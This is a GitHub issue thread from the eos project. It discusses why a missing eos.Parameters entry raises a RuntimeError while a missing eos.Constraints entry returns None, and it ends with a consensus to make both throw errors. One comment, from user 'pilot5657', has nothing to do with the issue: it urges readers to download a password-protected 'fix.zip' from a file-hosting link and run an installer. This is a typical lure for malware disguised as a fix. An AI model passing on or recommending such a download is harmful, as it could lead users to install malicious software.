### ISSUE TITLE
Inconsistent behaviour between eos.Parameters and eos.Constraints 

### ISSUE THREAD

**Issue by MJKirk** [eos/eos#899]
If you try and access a parameter that doesn't exist in `eos.Parameters` you get a python RuntimeError, whereas accessing a non existent constraint `eos.Constraints`  just returns NoneType

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MJKirk** [comment]
Compare
https://github.com/eos/eos/blob/86d8a76f0f08828f6888e3bd9bff3ea56c3ef1d4/eos/constraint.cc#L2573-L2576
with
https://github.com/eos/eos/blob/86d8a76f0f08828f6888e3bd9bff3ea56c3ef1d4/eos/utils/parameters.cc#L722-L723

**Comment by MJKirk** [comment]
Consensus was to make observable and constraint throw errors, like parameter
